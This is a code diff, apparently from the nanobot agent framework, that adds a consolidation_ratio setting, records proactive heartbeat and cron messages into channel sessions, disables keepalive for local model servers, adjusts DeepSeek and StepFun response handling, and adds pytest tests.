"""Normalize common HTML whitespace/entities from Teams into plain text spacing."""
|
||||||
|
normalized = html.unescape(text).replace("&rsquo", "’")
|
||||||
|
normalized = normalized.replace("\xa0", " ")
|
||||||
|
return normalized
|
||||||
|
|
||||||
def _normalize_teams_reply_quote(self, text: str) -> str:
|
def _normalize_teams_reply_quote(self, text: str) -> str:
|
||||||
"""Normalize Teams quoted replies into a compact structured form."""
|
"""Normalize Teams quoted replies into a compact structured form."""
|
||||||
cleaned = html.unescape(text).replace("&rsquo", "’").strip()
|
cleaned = self._normalize_html_whitespace(text).strip()
|
||||||
if not cleaned:
|
if not cleaned:
|
||||||
return ""
|
return ""
|
||||||
|
|
||||||
@ -494,6 +504,14 @@ class MSTeamsChannel(BaseChannel):
|
|||||||
def _save_refs(self) -> None:
|
def _save_refs(self) -> None:
|
||||||
"""Persist conversation references."""
|
"""Persist conversation references."""
|
||||||
try:
|
try:
|
||||||
|
stale_keys = [
|
||||||
|
key
|
||||||
|
for key, ref in self._conversation_refs.items()
|
||||||
|
if self._is_stale_or_unsupported_ref(ref)
|
||||||
|
]
|
||||||
|
for key in stale_keys:
|
||||||
|
self._conversation_refs.pop(key, None)
|
||||||
|
|
||||||
data = {
|
data = {
|
||||||
key: {
|
key: {
|
||||||
"service_url": ref.service_url,
|
"service_url": ref.service_url,
|
||||||
@ -502,6 +520,7 @@ class MSTeamsChannel(BaseChannel):
|
|||||||
"activity_id": ref.activity_id,
|
"activity_id": ref.activity_id,
|
||||||
"conversation_type": ref.conversation_type,
|
"conversation_type": ref.conversation_type,
|
||||||
"tenant_id": ref.tenant_id,
|
"tenant_id": ref.tenant_id,
|
||||||
|
"updated_at": ref.updated_at,
|
||||||
}
|
}
|
||||||
for key, ref in self._conversation_refs.items()
|
for key, ref in self._conversation_refs.items()
|
||||||
}
|
}
|
||||||
@ -509,6 +528,21 @@ class MSTeamsChannel(BaseChannel):
|
|||||||
except Exception as e:
|
except Exception as e:
|
||||||
logger.warning("Failed to save MSTeams conversation refs: {}", e)
|
logger.warning("Failed to save MSTeams conversation refs: {}", e)
|
||||||
|
|
||||||
|
def _is_stale_or_unsupported_ref(self, ref: ConversationRef) -> bool:
|
||||||
|
"""Reject unsupported refs and prune old refs."""
|
||||||
|
service_url = (ref.service_url or "").strip().lower()
|
||||||
|
conversation_type = (ref.conversation_type or "").strip().lower()
|
||||||
|
updated_at = ref.updated_at or 0.0
|
||||||
|
max_age_seconds = 30 * 24 * 60 * 60
|
||||||
|
|
||||||
|
if "webchat.botframework.com" in service_url:
|
||||||
|
return True
|
||||||
|
if conversation_type and conversation_type != "personal":
|
||||||
|
return True
|
||||||
|
if updated_at and updated_at < time.time() - max_age_seconds:
|
||||||
|
return True
|
||||||
|
return False
|
||||||
|
|
||||||
async def _get_access_token(self) -> str:
|
async def _get_access_token(self) -> str:
|
||||||
"""Fetch an access token for Bot Framework / Azure Bot auth."""
|
"""Fetch an access token for Bot Framework / Azure Bot auth."""
|
||||||
|
|
||||||
|
|||||||
@ -537,6 +537,7 @@ def serve(
|
|||||||
unified_session=runtime_config.agents.defaults.unified_session,
|
unified_session=runtime_config.agents.defaults.unified_session,
|
||||||
disabled_skills=runtime_config.agents.defaults.disabled_skills,
|
disabled_skills=runtime_config.agents.defaults.disabled_skills,
|
||||||
session_ttl_minutes=runtime_config.agents.defaults.session_ttl_minutes,
|
session_ttl_minutes=runtime_config.agents.defaults.session_ttl_minutes,
|
||||||
|
consolidation_ratio=runtime_config.agents.defaults.consolidation_ratio,
|
||||||
tools_config=runtime_config.tools,
|
tools_config=runtime_config.tools,
|
||||||
)
|
)
|
||||||
|
|
||||||
@ -597,6 +598,8 @@ def _run_gateway(
|
|||||||
"""Shared gateway runtime; ``open_browser_url`` opens a tab once channels are up."""
|
"""Shared gateway runtime; ``open_browser_url`` opens a tab once channels are up."""
|
||||||
from nanobot.agent.loop import AgentLoop
|
from nanobot.agent.loop import AgentLoop
|
||||||
from nanobot.agent.runtime import build_agent_runtime, load_agent_runtime
|
from nanobot.agent.runtime import build_agent_runtime, load_agent_runtime
|
||||||
|
from nanobot.agent.tools.cron import CronTool
|
||||||
|
from nanobot.agent.tools.message import MessageTool
|
||||||
from nanobot.bus.queue import MessageBus
|
from nanobot.bus.queue import MessageBus
|
||||||
from nanobot.channels.manager import ChannelManager
|
from nanobot.channels.manager import ChannelManager
|
||||||
from nanobot.cron.service import CronService
|
from nanobot.cron.service import CronService
|
||||||
@ -647,11 +650,52 @@ def _run_gateway(
|
|||||||
unified_session=config.agents.defaults.unified_session,
|
unified_session=config.agents.defaults.unified_session,
|
||||||
disabled_skills=config.agents.defaults.disabled_skills,
|
disabled_skills=config.agents.defaults.disabled_skills,
|
||||||
session_ttl_minutes=config.agents.defaults.session_ttl_minutes,
|
session_ttl_minutes=config.agents.defaults.session_ttl_minutes,
|
||||||
|
consolidation_ratio=config.agents.defaults.consolidation_ratio,
|
||||||
tools_config=config.tools,
|
tools_config=config.tools,
|
||||||
runtime_loader=load_agent_runtime,
|
runtime_loader=load_agent_runtime,
|
||||||
runtime_signature=runtime.signature,
|
runtime_signature=runtime.signature,
|
||||||
)
|
)
|
||||||
|
|
||||||
|
from nanobot.agent.loop import UNIFIED_SESSION_KEY
|
||||||
|
from nanobot.bus.events import OutboundMessage
|
||||||
|
|
||||||
|
def _channel_session_key(channel: str, chat_id: str) -> str:
|
||||||
|
return (
|
||||||
|
UNIFIED_SESSION_KEY
|
||||||
|
if config.agents.defaults.unified_session
|
||||||
|
else f"{channel}:{chat_id}"
|
||||||
|
)
|
||||||
|
|
||||||
|
async def _deliver_to_channel(msg: OutboundMessage, *, record: bool = False) -> None:
|
||||||
|
"""Publish a user-visible message and mirror it into that channel's session."""
|
||||||
|
metadata = dict(msg.metadata or {})
|
||||||
|
record = record or bool(metadata.pop("_record_channel_delivery", False))
|
||||||
|
if metadata != (msg.metadata or {}):
|
||||||
|
msg = OutboundMessage(
|
||||||
|
channel=msg.channel,
|
||||||
|
chat_id=msg.chat_id,
|
||||||
|
content=msg.content,
|
||||||
|
reply_to=msg.reply_to,
|
||||||
|
media=msg.media,
|
||||||
|
metadata=metadata,
|
||||||
|
buttons=msg.buttons,
|
||||||
|
)
|
||||||
|
if (
|
||||||
|
record
|
||||||
|
and msg.channel != "cli"
|
||||||
|
and msg.content.strip()
|
||||||
|
and hasattr(session_manager, "get_or_create")
|
||||||
|
and hasattr(session_manager, "save")
|
||||||
|
):
|
||||||
|
session = session_manager.get_or_create(_channel_session_key(msg.channel, msg.chat_id))
|
||||||
|
session.add_message("assistant", msg.content, _channel_delivery=True)
|
||||||
|
session_manager.save(session)
|
||||||
|
await bus.publish_outbound(msg)
|
||||||
|
|
||||||
|
message_tool = getattr(agent, "tools", {}).get("message")
|
||||||
|
if isinstance(message_tool, MessageTool):
|
||||||
|
message_tool.set_send_callback(_deliver_to_channel)
|
||||||
|
|
||||||
# Set cron callback (needs agent)
|
# Set cron callback (needs agent)
|
||||||
async def on_cron_job(job: CronJob) -> str | None:
|
async def on_cron_job(job: CronJob) -> str | None:
|
||||||
"""Execute a cron job through the agent."""
|
"""Execute a cron job through the agent."""
|
||||||
@ -664,8 +708,6 @@ def _run_gateway(
|
|||||||
logger.exception("Dream cron job failed")
|
logger.exception("Dream cron job failed")
|
||||||
return None
|
return None
|
||||||
|
|
||||||
from nanobot.agent.tools.cron import CronTool
|
|
||||||
from nanobot.agent.tools.message import MessageTool
|
|
||||||
from nanobot.utils.evaluator import evaluate_response
|
from nanobot.utils.evaluator import evaluate_response
|
||||||
|
|
||||||
reminder_note = (
|
reminder_note = (
|
||||||
@ -682,6 +724,10 @@ def _run_gateway(
|
|||||||
async def _silent(*_args, **_kwargs):
|
async def _silent(*_args, **_kwargs):
|
||||||
pass
|
pass
|
||||||
|
|
||||||
|
message_record_token = None
|
||||||
|
if isinstance(message_tool, MessageTool):
|
||||||
|
message_record_token = message_tool.set_record_channel_delivery(True)
|
||||||
|
|
||||||
try:
|
try:
|
||||||
resp = await agent.process_direct(
|
resp = await agent.process_direct(
|
||||||
reminder_note,
|
reminder_note,
|
||||||
@ -693,10 +739,11 @@ def _run_gateway(
|
|||||||
finally:
|
finally:
|
||||||
if isinstance(cron_tool, CronTool) and cron_token is not None:
|
if isinstance(cron_tool, CronTool) and cron_token is not None:
|
||||||
cron_tool.reset_cron_context(cron_token)
|
cron_tool.reset_cron_context(cron_token)
|
||||||
|
if isinstance(message_tool, MessageTool) and message_record_token is not None:
|
||||||
|
message_tool.reset_record_channel_delivery(message_record_token)
|
||||||
|
|
||||||
response = resp.content if resp else ""
|
response = resp.content if resp else ""
|
||||||
|
|
||||||
message_tool = agent.tools.get("message")
|
|
||||||
if job.payload.deliver and isinstance(message_tool, MessageTool) and message_tool._sent_in_turn:
|
if job.payload.deliver and isinstance(message_tool, MessageTool) and message_tool._sent_in_turn:
|
||||||
return response
|
return response
|
||||||
|
|
||||||
@ -705,12 +752,14 @@ def _run_gateway(
|
|||||||
response, reminder_note, provider, agent.model,
|
response, reminder_note, provider, agent.model,
|
||||||
)
|
)
|
||||||
if should_notify:
|
if should_notify:
|
||||||
from nanobot.bus.events import OutboundMessage
|
await _deliver_to_channel(
|
||||||
await bus.publish_outbound(OutboundMessage(
|
OutboundMessage(
|
||||||
channel=job.payload.channel or "cli",
|
channel=job.payload.channel or "cli",
|
||||||
chat_id=job.payload.to,
|
chat_id=job.payload.to,
|
||||||
content=response,
|
content=response,
|
||||||
))
|
),
|
||||||
|
record=True,
|
||||||
|
)
|
||||||
return response
|
return response
|
||||||
|
|
||||||
cron.on_job = on_cron_job
|
cron.on_job = on_cron_job
|
||||||
@ -760,12 +809,22 @@ def _run_gateway(
|
|||||||
return resp.content if resp else ""
|
return resp.content if resp else ""
|
||||||
|
|
||||||
async def on_heartbeat_notify(response: str) -> None:
|
async def on_heartbeat_notify(response: str) -> None:
|
||||||
"""Deliver a heartbeat response to the user's channel."""
|
"""Deliver a heartbeat response to the user's channel.
|
||||||
from nanobot.bus.events import OutboundMessage
|
|
||||||
|
In addition to publishing the outbound message, this injects the
|
||||||
|
delivered text as an assistant turn into the *target channel's*
|
||||||
|
session. Without this, a user reply on the channel (e.g. "Sure")
|
||||||
|
lands in a session that has no context about the heartbeat message
|
||||||
|
and the agent cannot follow through.
|
||||||
|
"""
|
||||||
channel, chat_id = _pick_heartbeat_target()
|
channel, chat_id = _pick_heartbeat_target()
|
||||||
if channel == "cli":
|
if channel == "cli":
|
||||||
return # No external channel available to deliver to
|
return # No external channel available to deliver to
|
||||||
await bus.publish_outbound(OutboundMessage(channel=channel, chat_id=chat_id, content=response))
|
|
||||||
|
await _deliver_to_channel(
|
||||||
|
OutboundMessage(channel=channel, chat_id=chat_id, content=response),
|
||||||
|
record=True,
|
||||||
|
)
|
||||||
|
|
||||||
hb_cfg = config.gateway.heartbeat
|
hb_cfg = config.gateway.heartbeat
|
||||||
heartbeat = HeartbeatService(
|
heartbeat = HeartbeatService(
|
||||||
@ -968,6 +1027,7 @@ def agent(
|
|||||||
unified_session=config.agents.defaults.unified_session,
|
unified_session=config.agents.defaults.unified_session,
|
||||||
disabled_skills=config.agents.defaults.disabled_skills,
|
disabled_skills=config.agents.defaults.disabled_skills,
|
||||||
session_ttl_minutes=config.agents.defaults.session_ttl_minutes,
|
session_ttl_minutes=config.agents.defaults.session_ttl_minutes,
|
||||||
|
consolidation_ratio=config.agents.defaults.consolidation_ratio,
|
||||||
tools_config=config.tools,
|
tools_config=config.tools,
|
||||||
)
|
)
|
||||||
restart_notice = consume_restart_notice_from_env()
|
restart_notice = consume_restart_notice_from_env()
|
||||||
|
|||||||
@ -90,6 +90,13 @@ class AgentDefaults(Base):
|
|||||||
validation_alias=AliasChoices("idleCompactAfterMinutes", "sessionTtlMinutes"),
|
validation_alias=AliasChoices("idleCompactAfterMinutes", "sessionTtlMinutes"),
|
||||||
serialization_alias="idleCompactAfterMinutes",
|
serialization_alias="idleCompactAfterMinutes",
|
||||||
) # Auto-compact idle threshold in minutes (0 = disabled)
|
) # Auto-compact idle threshold in minutes (0 = disabled)
|
||||||
|
consolidation_ratio: float = Field(
|
||||||
|
default=0.5,
|
||||||
|
ge=0.1,
|
||||||
|
le=0.95,
|
||||||
|
validation_alias=AliasChoices("consolidationRatio"),
|
||||||
|
serialization_alias="consolidationRatio",
|
||||||
|
) # Consolidation target ratio (0.5 = 50% of budget retained after compression)
|
||||||
dream: DreamConfig = Field(default_factory=DreamConfig)
|
dream: DreamConfig = Field(default_factory=DreamConfig)
|
||||||
|
|
||||||
|
|
||||||
|
|||||||
@ -84,6 +84,7 @@ class Nanobot:
|
|||||||
unified_session=defaults.unified_session,
|
unified_session=defaults.unified_session,
|
||||||
disabled_skills=defaults.disabled_skills,
|
disabled_skills=defaults.disabled_skills,
|
||||||
session_ttl_minutes=defaults.session_ttl_minutes,
|
session_ttl_minutes=defaults.session_ttl_minutes,
|
||||||
|
consolidation_ratio=defaults.consolidation_ratio,
|
||||||
tools_config=config.tools,
|
tools_config=config.tools,
|
||||||
)
|
)
|
||||||
return cls(loop)
|
return cls(loop)
|
||||||
|
|||||||
@ -3,17 +3,20 @@
|
|||||||
from __future__ import annotations
|
from __future__ import annotations
|
||||||
|
|
||||||
import asyncio
|
import asyncio
|
||||||
import json
|
|
||||||
import hashlib
|
import hashlib
|
||||||
import importlib.util
|
import importlib.util
|
||||||
|
import json
|
||||||
import os
|
import os
|
||||||
import secrets
|
import secrets
|
||||||
import string
|
import string
|
||||||
import time
|
import time
|
||||||
import uuid
|
import uuid
|
||||||
from collections.abc import Awaitable, Callable
|
from collections.abc import Awaitable, Callable
|
||||||
|
from ipaddress import ip_address
|
||||||
from typing import TYPE_CHECKING, Any
|
from typing import TYPE_CHECKING, Any
|
||||||
|
from urllib.parse import urlparse
|
||||||
|
|
||||||
|
import httpx
|
||||||
import json_repair
|
import json_repair
|
||||||
from loguru import logger
|
from loguru import logger
|
||||||
|
|
||||||
@ -159,6 +162,37 @@ _RESPONSES_FAILURE_THRESHOLD = 3
|
|||||||
_RESPONSES_PROBE_INTERVAL_S = 300 # 5 minutes
|
_RESPONSES_PROBE_INTERVAL_S = 300 # 5 minutes
|
||||||
|
|
||||||
|
|
||||||
|
def _is_local_endpoint(
|
||||||
|
spec: "ProviderSpec | None",
|
||||||
|
api_base: str | None,
|
||||||
|
) -> bool:
|
||||||
|
"""Return True when the endpoint is a local or LAN model server.
|
||||||
|
|
||||||
|
Matches either the provider spec's ``is_local`` flag or common private-
|
||||||
|
network patterns in the base URL (localhost, 127.x, 192.168.x, 10.x,
|
||||||
|
172.16-31.x, Docker ``host.docker.internal``).
|
||||||
|
"""
|
||||||
|
if spec and spec.is_local:
|
||||||
|
return True
|
||||||
|
if not api_base:
|
||||||
|
return False
|
||||||
|
raw = api_base.strip().lower()
|
||||||
|
parsed = urlparse(raw if "://" in raw else f"//{raw}")
|
||||||
|
try:
|
||||||
|
host = parsed.hostname
|
||||||
|
except ValueError:
|
||||||
|
return False
|
||||||
|
if host in {"localhost", "host.docker.internal"}:
|
||||||
|
return True
|
||||||
|
if not host:
|
||||||
|
return False
|
||||||
|
try:
|
||||||
|
addr = ip_address(host)
|
||||||
|
except ValueError:
|
||||||
|
return False
|
||||||
|
return addr.is_loopback or addr.is_private
|
||||||
|
|
||||||
|
|
||||||
def _is_direct_openai_base(api_base: str | None) -> bool:
|
def _is_direct_openai_base(api_base: str | None) -> bool:
|
||||||
"""Return True for direct OpenAI endpoints, not generic OpenAI-compatible gateways."""
|
"""Return True for direct OpenAI endpoints, not generic OpenAI-compatible gateways."""
|
||||||
if not api_base:
|
if not api_base:
|
||||||
@ -208,11 +242,27 @@ class OpenAICompatProvider(LLMProvider):
|
|||||||
if extra_headers:
|
if extra_headers:
|
||||||
default_headers.update(extra_headers)
|
default_headers.update(extra_headers)
|
||||||
|
|
||||||
|
# Local model servers (Ollama, llama.cpp, vLLM) often close idle
|
||||||
|
# HTTP connections before the client-side keepalive expires. When
|
||||||
|
# two LLM calls happen seconds apart (e.g. heartbeat _decide then
|
||||||
|
# process_direct), the second call may grab a now-dead pooled
|
||||||
|
# connection, causing a transient APIConnectionError on every first
|
||||||
|
# attempt. Disabling keepalive for local endpoints avoids this by
|
||||||
|
# opening a fresh connection for each request, which is cheap on a
|
||||||
|
# LAN. Cloud providers benefit from keepalive, so we leave the
|
||||||
|
# default pool settings for them.
|
||||||
|
http_client: httpx.AsyncClient | None = None
|
||||||
|
if _is_local_endpoint(spec, effective_base):
|
||||||
|
http_client = httpx.AsyncClient(
|
||||||
|
limits=httpx.Limits(keepalive_expiry=0),
|
||||||
|
)
|
||||||
|
|
||||||
self._client = AsyncOpenAI(
|
self._client = AsyncOpenAI(
|
||||||
api_key=api_key or "no-key",
|
api_key=api_key or "no-key",
|
||||||
base_url=effective_base,
|
base_url=effective_base,
|
||||||
default_headers=default_headers,
|
default_headers=default_headers,
|
||||||
max_retries=0,
|
max_retries=0,
|
||||||
|
http_client=http_client,
|
||||||
)
|
)
|
||||||
|
|
||||||
# Responses API circuit breaker: skip after repeated failures,
|
# Responses API circuit breaker: skip after repeated failures,
|
||||||
@ -334,6 +384,47 @@ class OpenAICompatProvider(LLMProvider):
|
|||||||
clean["tool_call_id"] = map_id(clean["tool_call_id"])
|
clean["tool_call_id"] = map_id(clean["tool_call_id"])
|
||||||
return self._enforce_role_alternation(sanitized)
|
return self._enforce_role_alternation(sanitized)
|
||||||
|
|
||||||
|
def _drop_deepseek_incomplete_reasoning_history(
|
||||||
|
self,
|
||||||
|
messages: list[dict[str, Any]],
|
||||||
|
reasoning_effort: str | None,
|
||||||
|
) -> list[dict[str, Any]]:
|
||||||
|
if (
|
||||||
|
not self._spec
|
||||||
|
or self._spec.name != "deepseek"
|
||||||
|
or not reasoning_effort
|
||||||
|
or reasoning_effort.lower() == "none"
|
||||||
|
):
|
||||||
|
return messages
|
||||||
|
|
||||||
|
bad_idx = None
|
||||||
|
for idx, msg in enumerate(messages):
|
||||||
|
if (
|
||||||
|
msg.get("role") == "assistant"
|
||||||
|
and msg.get("tool_calls")
|
||||||
|
and not msg.get("reasoning_content")
|
||||||
|
):
|
||||||
|
bad_idx = idx
|
||||||
|
if bad_idx is None:
|
||||||
|
return messages
|
||||||
|
|
||||||
|
keep_from = None
|
||||||
|
for idx in range(bad_idx + 1, len(messages)):
|
||||||
|
if messages[idx].get("role") == "user":
|
||||||
|
keep_from = idx
|
||||||
|
break
|
||||||
|
|
||||||
|
if keep_from is None:
|
||||||
|
trimmed = messages[:bad_idx]
|
||||||
|
else:
|
||||||
|
prefix = [msg for msg in messages[:keep_from] if msg.get("role") == "system"]
|
||||||
|
trimmed = prefix + messages[keep_from:]
|
||||||
|
logger.warning(
|
||||||
|
"Dropped {} DeepSeek thinking history message(s) with incomplete reasoning_content",
|
||||||
|
len(messages) - len(trimmed),
|
||||||
|
)
|
||||||
|
return trimmed
|
||||||
|
|
||||||
# ------------------------------------------------------------------
|
# ------------------------------------------------------------------
|
||||||
# Build kwargs
|
# Build kwargs
|
||||||
# ------------------------------------------------------------------
|
# ------------------------------------------------------------------
|
||||||
@ -374,6 +465,10 @@ class OpenAICompatProvider(LLMProvider):
|
|||||||
if spec and spec.strip_model_prefix:
|
if spec and spec.strip_model_prefix:
|
||||||
model_name = model_name.split("/")[-1]
|
model_name = model_name.split("/")[-1]
|
||||||
|
|
||||||
|
messages = self._drop_deepseek_incomplete_reasoning_history(
|
||||||
|
messages,
|
||||||
|
reasoning_effort,
|
||||||
|
)
|
||||||
kwargs: dict[str, Any] = {
|
kwargs: dict[str, Any] = {
|
||||||
"model": model_name,
|
"model": model_name,
|
||||||
"messages": self._sanitize_messages(self._sanitize_empty_content(messages)),
|
"messages": self._sanitize_messages(self._sanitize_empty_content(messages)),
|
||||||
@ -709,8 +804,8 @@ class OpenAICompatProvider(LLMProvider):
|
|||||||
finish_reason = str(choice0.get("finish_reason") or "stop")
|
finish_reason = str(choice0.get("finish_reason") or "stop")
|
||||||
|
|
||||||
raw_tool_calls: list[Any] = []
|
raw_tool_calls: list[Any] = []
|
||||||
# StepFun Plan: fallback to reasoning field when content is empty
|
# StepFun: fallback to reasoning field when content is empty
|
||||||
if not content and msg0.get("reasoning"):
|
if not content and msg0.get("reasoning") and self._spec and self._spec.reasoning_as_content:
|
||||||
content = self._extract_text_content(msg0.get("reasoning"))
|
content = self._extract_text_content(msg0.get("reasoning"))
|
||||||
reasoning_content = msg0.get("reasoning_content")
|
reasoning_content = msg0.get("reasoning_content")
|
||||||
if not reasoning_content and msg0.get("reasoning"):
|
if not reasoning_content and msg0.get("reasoning"):
|
||||||
@ -770,7 +865,7 @@ class OpenAICompatProvider(LLMProvider):
|
|||||||
finish_reason = ch.finish_reason
|
finish_reason = ch.finish_reason
|
||||||
if not content and m.content:
|
if not content and m.content:
|
||||||
content = m.content
|
content = m.content
|
||||||
if not content and getattr(m, "reasoning", None):
|
if not content and getattr(m, "reasoning", None) and self._spec and self._spec.reasoning_as_content:
|
||||||
content = m.reasoning
|
content = m.reasoning
|
||||||
|
|
||||||
tool_calls = []
|
tool_calls = []
|
||||||
|
|||||||
@ -71,6 +71,11 @@ class ProviderSpec:
|
|||||||
# "reasoning_split" — {"reasoning_split": true/false} (MiniMax)
|
# "reasoning_split" — {"reasoning_split": true/false} (MiniMax)
|
||||||
thinking_style: str = ""
|
thinking_style: str = ""
|
||||||
|
|
||||||
|
# When True, treat the "reasoning" response field as formal content
|
||||||
|
# when "content" is empty. Only set this for providers (e.g. StepFun)
|
||||||
|
# whose API returns the actual answer in "reasoning" instead of "content".
|
||||||
|
reasoning_as_content: bool = False
|
||||||
|
|
||||||
@property
|
@property
|
||||||
def label(self) -> str:
|
def label(self) -> str:
|
||||||
return self.display_name or self.name.title()
|
return self.display_name or self.name.title()
|
||||||
@ -325,6 +330,7 @@ PROVIDERS: tuple[ProviderSpec, ...] = (
|
|||||||
display_name="Step Fun",
|
display_name="Step Fun",
|
||||||
backend="openai_compat",
|
backend="openai_compat",
|
||||||
default_api_base="https://api.stepfun.com/v1",
|
default_api_base="https://api.stepfun.com/v1",
|
||||||
|
reasoning_as_content=True,
|
||||||
),
|
),
|
||||||
# Xiaomi MIMO (小米): OpenAI-compatible API
|
# Xiaomi MIMO (小米): OpenAI-compatible API
|
||||||
ProviderSpec(
|
ProviderSpec(
|
||||||
|
|||||||
@ -46,10 +46,14 @@ class Session:
|
|||||||
unconsolidated = self.messages[self.last_consolidated:]
|
unconsolidated = self.messages[self.last_consolidated:]
|
||||||
sliced = unconsolidated[-max_messages:]
|
sliced = unconsolidated[-max_messages:]
|
||||||
|
|
||||||
# Avoid starting mid-turn when possible.
|
# Avoid starting mid-turn when possible, except for proactive
|
||||||
|
# assistant deliveries that the user may be replying to.
|
||||||
for i, message in enumerate(sliced):
|
for i, message in enumerate(sliced):
|
||||||
if message.get("role") == "user":
|
if message.get("role") == "user":
|
||||||
sliced = sliced[i:]
|
start = i
|
||||||
|
if i > 0 and sliced[i - 1].get("_channel_delivery"):
|
||||||
|
start = i - 1
|
||||||
|
sliced = sliced[start:]
|
||||||
break
|
break
|
||||||
|
|
||||||
# Drop orphan tool results at the front.
|
# Drop orphan tool results at the front.
|
||||||
|
|||||||
108
tests/agent/test_consolidation_ratio.py
Normal file
108
tests/agent/test_consolidation_ratio.py
Normal file
@ -0,0 +1,108 @@
|
|||||||
|
"""Tests for configurable consolidation_ratio."""
|
||||||
|
|
||||||
|
from unittest.mock import AsyncMock, MagicMock
|
||||||
|
|
||||||
|
import pytest
|
||||||
|
from pydantic import ValidationError
|
||||||
|
|
||||||
|
import nanobot.agent.memory as memory_module
|
||||||
|
from nanobot.agent.loop import AgentLoop
|
||||||
|
from nanobot.bus.queue import MessageBus
|
||||||
|
from nanobot.config.schema import AgentDefaults
|
||||||
|
from nanobot.providers.base import GenerationSettings, LLMResponse
|
||||||
|
|
||||||
|
|
||||||
|
def _make_loop(
|
||||||
|
tmp_path,
|
||||||
|
*,
|
||||||
|
estimated_tokens: int = 0,
|
||||||
|
context_window_tokens: int = 200,
|
||||||
|
consolidation_ratio: float = 0.5,
|
||||||
|
) -> AgentLoop:
|
||||||
|
provider = MagicMock()
|
||||||
|
provider.get_default_model.return_value = "test-model"
|
||||||
|
provider.generation = GenerationSettings(max_tokens=0)
|
||||||
|
provider.estimate_prompt_tokens.return_value = (estimated_tokens, "test-counter")
|
||||||
|
_response = LLMResponse(content="ok", tool_calls=[])
|
||||||
|
provider.chat_with_retry = AsyncMock(return_value=_response)
|
||||||
|
provider.chat_stream_with_retry = AsyncMock(return_value=_response)
|
||||||
|
|
||||||
|
loop = AgentLoop(
|
||||||
|
bus=MessageBus(),
|
||||||
|
provider=provider,
|
||||||
|
workspace=tmp_path,
|
||||||
|
model="test-model",
|
||||||
|
context_window_tokens=context_window_tokens,
|
||||||
|
consolidation_ratio=consolidation_ratio,
|
||||||
|
)
|
||||||
|
loop.tools.get_definitions = MagicMock(return_value=[])
|
||||||
|
loop.consolidator._SAFETY_BUFFER = 0
|
||||||
|
return loop
|
||||||
|
|
||||||
|
|
||||||
|
def _session_with_turns(loop: AgentLoop, *, turns: int):
|
||||||
|
session = loop.sessions.get_or_create("cli:test")
|
||||||
|
session.messages = []
|
||||||
|
for i in range(turns):
|
||||||
|
session.messages.append({"role": "user", "content": f"u{i}", "timestamp": f"2026-01-01T00:00:{i:02d}"})
|
||||||
|
session.messages.append({"role": "assistant", "content": f"a{i}", "timestamp": f"2026-01-01T00:01:{i:02d}"})
|
||||||
|
loop.sessions.save(session)
|
||||||
|
return session
|
||||||
|
|
||||||
|
|
||||||
|
@pytest.mark.asyncio
|
||||||
|
@pytest.mark.parametrize(
|
||||||
|
("ratio", "context_window_tokens", "estimates", "expected_archives"),
|
||||||
|
[
|
||||||
|
(0.5, 200, [250, 90], 1),
|
||||||
|
(0.1, 1000, [1200, 800, 400, 50], 2),
|
||||||
|
(0.9, 200, [300, 175], 1),
|
||||||
|
],
|
||||||
|
)
|
||||||
|
async def test_consolidation_ratio_controls_target(
|
||||||
|
tmp_path,
|
||||||
|
monkeypatch,
|
||||||
|
ratio: float,
|
||||||
|
context_window_tokens: int,
|
||||||
|
estimates: list[int],
|
||||||
|
expected_archives: int,
|
||||||
|
) -> None:
|
||||||
|
loop = _make_loop(
|
||||||
|
tmp_path,
|
||||||
|
context_window_tokens=context_window_tokens,
|
||||||
|
consolidation_ratio=ratio,
|
||||||
|
)
|
||||||
|
loop.consolidator.archive = AsyncMock(return_value=True) # type: ignore[method-assign]
|
||||||
|
session = _session_with_turns(loop, turns=10)
|
||||||
|
|
||||||
|
remaining_estimates = list(estimates)
|
||||||
|
|
||||||
|
def mock_estimate(_session, *, session_summary=None):
|
||||||
|
assert session_summary is None
|
||||||
|
return (remaining_estimates.pop(0), "test")
|
||||||
|
|
||||||
|
loop.consolidator.estimate_session_prompt_tokens = mock_estimate # type: ignore[method-assign]
|
||||||
|
monkeypatch.setattr(memory_module, "estimate_message_tokens", lambda _m: 100)
|
||||||
|
|
||||||
|
await loop.consolidator.maybe_consolidate_by_tokens(session)
|
||||||
|
|
||||||
|
assert loop.consolidator.archive.await_count == expected_archives
|
||||||
|
|
||||||
|
|
||||||
|
def test_ratio_propagated_from_config_schema() -> None:
|
||||||
|
defaults = AgentDefaults()
|
||||||
|
assert defaults.consolidation_ratio == 0.5
|
||||||
|
|
||||||
|
defaults = AgentDefaults.model_validate({"consolidationRatio": 0.3})
|
||||||
|
assert defaults.consolidation_ratio == 0.3
|
||||||
|
|
||||||
|
dumped = defaults.model_dump(by_alias=True)
|
||||||
|
assert dumped["consolidationRatio"] == 0.3
|
||||||
|
|
||||||
|
|
||||||
|
def test_ratio_validation_rejects_out_of_range() -> None:
|
||||||
|
with pytest.raises(ValidationError):
|
||||||
|
AgentDefaults(consolidation_ratio=0.05)
|
||||||
|
|
||||||
|
with pytest.raises(ValidationError):
|
||||||
|
AgentDefaults(consolidation_ratio=1.0)
|
||||||
@ -1,6 +1,6 @@
|
|||||||
"""Tests for Feishu reaction add/remove and auto-cleanup on stream end."""
|
"""Tests for Feishu reaction add/remove and auto-cleanup on stream end."""
|
||||||
from types import SimpleNamespace
|
from types import SimpleNamespace
|
||||||
from unittest.mock import AsyncMock, MagicMock, patch
|
from unittest.mock import AsyncMock, MagicMock
|
||||||
|
|
||||||
import pytest
|
import pytest
|
||||||
|
|
||||||
@ -160,19 +160,38 @@ class TestRemoveReactionAsync:
|
|||||||
|
|
||||||
|
|
||||||
class TestStreamEndReactionCleanup:
|
class TestStreamEndReactionCleanup:
|
||||||
|
@pytest.mark.asyncio
|
||||||
|
async def test_stream_buffers_are_scoped_by_message_id(self):
|
||||||
|
ch = _make_channel()
|
||||||
|
ch._create_streaming_card_sync = MagicMock(return_value=None)
|
||||||
|
|
||||||
|
await ch.send_delta(
|
||||||
|
"oc_chat1", "first",
|
||||||
|
metadata={"message_id": "om_first"},
|
||||||
|
)
|
||||||
|
await ch.send_delta(
|
||||||
|
"oc_chat1", "second",
|
||||||
|
metadata={"message_id": "om_second"},
|
||||||
|
)
|
||||||
|
|
||||||
|
assert ch._stream_bufs["om_first"].text == "first"
|
||||||
|
assert ch._stream_bufs["om_second"].text == "second"
|
||||||
|
assert "oc_chat1" not in ch._stream_bufs
|
||||||
|
|
||||||
@pytest.mark.asyncio
|
@pytest.mark.asyncio
|
||||||
async def test_removes_reaction_on_stream_end(self):
|
async def test_removes_reaction_on_stream_end(self):
|
||||||
ch = _make_channel()
|
ch = _make_channel()
|
||||||
ch._stream_bufs["oc_chat1"] = _FeishuStreamBuf(
|
